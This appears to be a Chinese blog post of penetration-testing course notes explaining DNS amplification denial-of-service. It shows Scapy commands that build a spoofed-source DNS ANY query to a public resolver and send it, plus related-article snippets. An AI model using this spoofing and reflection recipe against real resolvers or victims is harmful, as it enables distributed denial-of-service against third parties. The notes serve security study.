Kali Linux渗透测试 129 拒绝服务--DNS 放大攻击

最新推荐文章于 2022-11-06 21:10:34 发布
最新推荐文章于 2022-11-06 21:10:34 发布
阅读量2k 收藏 1
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79905169
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 产生大流量的攻击方法

    • 单机的带宽优势
    • 巨大单机数量形成的流量汇聚
    • 利用协议特性实现放大效果的流量

  • DNS协议放大效果

    • 查询请求流量小,但响应流量可能非常巨大
    • dig ANY hp.com @202 106.0.20 (流量放大约8倍)

  • 攻击原理

    • 伪造源地址为被攻击目标地址,向递归域名查询服务器发起查询
    • DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDOS

2. 攻击

root@kali:~# dig any baidu.com @114.114.114.114

发送60字节长度,返回216字节长度

3.Scapy 构造攻击数据包原理

  • IP/UDP/DNS/DNS 查询内容

  • 结合IP地址欺骗,利用大量 DNS 服务器做傀儡攻击目标

4. 构造数据包过程

  1. 构造 IP 数据包

    >>> i=IP()
>>> i.display()


    >>> i.dst="114.114.114.114"
>>> i.display()

  2. 构造 UDP 数据包

    >>> u=UDP()
>>> u.display()

  3. 构造 DNS 数据包

    >>> d=DNS()
>>> d.display()


    >>> d.rd=1
>>> d.qdcount=1
>>> d.display()

  4. 设置查询目标

    >>> q=DNSQR()
>>> q.display()


    >>> q.qname='qq.com'
>>> q.qtype=255   #(代表any)


    >>> d.qd=q   # 设置目标
>>> d.display()

  5. 拼接数据包

    >>> r=(i/u/d)
>>> r


    >>> r.display()
>>> sr1(r)


    >>> i.src="10.10.10.141"
>>> r=(i/u/d)
>>> r.display()

  6. 发送数据包

    >>> send(r)

    发送 60 字节的数据包,返回 230 字节的数据包

网络安全打工人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
kali linuxDNS,NTP放大攻击
weixin_30680385的博客
03-04 528
DNS放大: 产生大流量的攻击方法-----单机的带宽优势,巨大的单机数量形成的流量汇聚,利用协议特性实现放大效果的流量 DNS协议放大效果----查询请求流量小,但响应流量可能非常巨大(dig ANY baidu.com @8.8.8.8流量放大约8倍) 攻击原理: 伪造源地址为被攻击目标地址,向递归域名查询服务器发起查询 DNS服务器成为流量放大和实施攻击者,大量DNS服...
网络安全实验之《拒绝服务攻击检测》实验报告
7xun's space
04-16 1881
根据拒绝服务攻击的原理:“拒绝服务攻击是针对网络应用有限数量的服务能力,发起大规模的网络服务的请求,耗尽网络应用能够提供的服务计算资源等,使网络应用无法对正常用户的请求进行服务,实现拒绝服务。这些知识是从课本上学不到的,正所谓“纸上得来终觉浅,绝知此事要躬行”。可以看到,日志文件中触发网络攻击告警信息的检测规则的编号与配置的检测规则的编号相同,也与wireshark捕获的包的特征相同。同时,在进行实验的过程中,我也遇到了许多问题,在解决这些问题的过程中,我也收获了许多,学习到了很多。
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1606
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
DNS放大攻击
swordheart的博客
01-24 2832
DNS放大攻击 原理说明 利用DNSDNS服务器发起DoS攻击: 肉鸡向DNS服务器发起大量伪造DNS请求,当DNS服务器解析在本机数据库之中查询不到该域名信息时,会向 下一级DNS服务器进行询问,但肉鸡本身就是发起大量伪造DNS域名请求,导致DNS服务器查询业务逐级放大,消耗DNS服务器资源,以至于正常的DNS请求无法及时得到响应。最终达到攻击DNS服务器的目的。 利用DNS发起放大(DoS)攻击放大攻击又叫杠杆攻击攻击者不把通信包直接发给受害者,而是发给放大器(DNS服务器),然
DNS放大攻击初探
m0_60571990的博客
11-06 1008
DNS放大攻击初探
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
udp flood攻击的socket实现
12-26
udp flood攻击。采用向同一网络地址频繁发送相同的udp数据包的方攻击攻击的同时伪造自身源ip地址,源mac地址。 需要微软socket相关库
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook 目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
UDP攻击实现
06-17
UDP攻击 通过不断的对发送端发送数据从而实现udp数据攻击的效果,用packetviewer可对发送和接受的数据进行查看
kali-linux-2023.3-vmware-amd64.part3.rar
最新发布
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
什么是 DNS 放大攻击
chujiuai1874的博客
11-22 1803
DNS放大是一种分布拒绝服务 (DDoS) 攻击,其中,攻击者利用域名系统 (DNS) 服务器中的漏洞,将最初很小的查询变成较大的负载,达到其破坏受害者服务器的目的。 DNS 放大是一种反射攻击,它通过操纵可公开访问域名系统,用大量UDP包淹没一个特定目标。利用各种放大技术,攻击者可”放大”...
DNS攻击详解
weixin_47726676的博客
06-13 9028
目录DNS概念什么是DNS因特网的域名结构DNS域名服务器DNS攻击DDOS攻击基于主机耗尽型的dns查询拒绝服务攻击DNS query Flooding)攻击方法防御策略基于宽带耗尽型的DNS反弹拒绝服务攻击DNS reflector attacks,又称DNS amplification attacks)攻击方法防御策略会话劫持劫持dns服务器地址hosts文件被修改DNS服务器缓存中的映射关系被修改,又称缓存投毒攻击 DNS概念 什么是DNS 域名系统DNS(Domain Name System
基于kalidns攻击
Culprit的博客
01-30 3176
实验材料: kali攻击机 靶机 实验步骤:1.找到etter.dnsw文件路径 可以用图形界面更改文件参数,添加红框里面的内容为kali ip 然后保存 2.在/var/www/html文件夹下找到index.html 文件用自己新建的文件替换。此为自己新建主页 3.打开ettercap,选择sniff---unified sniffing 4.选择自己的网卡、可在
DOS+DNS放大攻击工具编写
GuoJiayu_blog的博客
08-31 6717
1.前言:        DOS攻击原理:发送大量的数据包消耗目标主机资源,使其无法正常工作。      DNS放大攻击的原理:伪造DNS数据包,向DNS服务器发送域名查询报文了,而DNS服务器返回的应答报文则会发送给被攻击主机。放大体现在请求DNS回复的类型为ANY,攻击者向服务器请求的包长度为69个字节,而服务器向被攻击主机回复的ANY类型DNS包长度为535字节,大约放大了7倍。
Kali Linux渗透测试实战指南
"Kali Linux 渗透测试实训手册,包含Kali中各种工具的使用方法,适合初学者通过实践操作快速掌握渗透测试技能。书中提供了详细的实例解析,包括安装Kali、Windows、Metasploit等系统,以及使用各种必备工具如VMware...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值